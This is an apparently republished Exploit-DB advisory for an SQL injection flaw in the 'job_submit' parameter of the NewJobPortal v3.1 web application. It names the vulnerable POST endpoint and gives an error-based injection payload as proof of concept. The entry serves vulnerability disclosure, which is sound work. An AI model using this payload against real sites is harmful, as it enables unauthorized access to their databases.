Job Portal 3.1 – ‘job_submit’ SQL Injection

• Exploit Database
• 14 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46622/

• ===========================================================================================
  # Exploit Title: NewJobPortal v3.1 - 'job_submit' SQL Inj.
  # Dork: N/A
  # Date: 25-03-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://codecanyon.net/item/job-portal/15330095
  # Version: v3.1
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: Job portal is developed for creating an interactive
  job vacancy for candidates.
  This web application is to be conceived in its current form as a dynamic
  site-requiring constant
  updates both from the seekers as well as the companies.
  ===========================================================================================
  # POC - SQLi
  # Parameters : job_submit
  # Attack Pattern : convert(int%2c+cast(0x454d49524f474c55+as+varchar(8000)))
  # POST Method : http://localhost/newjobportal/job_search/search
  ===========================================================================================